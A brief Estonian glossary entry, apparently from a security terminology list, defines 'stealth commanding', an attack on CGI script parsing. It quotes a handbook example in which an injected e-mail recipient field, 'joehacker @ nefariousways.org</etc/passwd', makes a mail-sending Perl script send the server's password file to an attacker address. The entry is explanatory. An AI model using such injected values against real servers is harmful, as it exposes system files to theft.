olemus
rünne veebiserveri kaudu,
on suunatud veebiserverit majutavale
operatsioonisüsteemile,
põhineb CGI-käskude ja päringute tõlgendamise nõrkustel

a set of techniques allowing attackers to exploit parsing problems in server-side scripts to change the code executed by the server

ülevaateid
https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/stealth_commanding.htm

näide
raamatust Cybersecurity Operations Handbook:
- server küsib kasutajalt teabe saatmiseks meiliaadressi ja
- selle skriptis on käsk open (MAIL, "|$mailprog $recipient")
- väljale $recipient paigutab ründaja
"joehacker @ nefariousways.org</etc/passwd",
lastes oma aadressile saata paroolifaili

vt ka
- käsusüst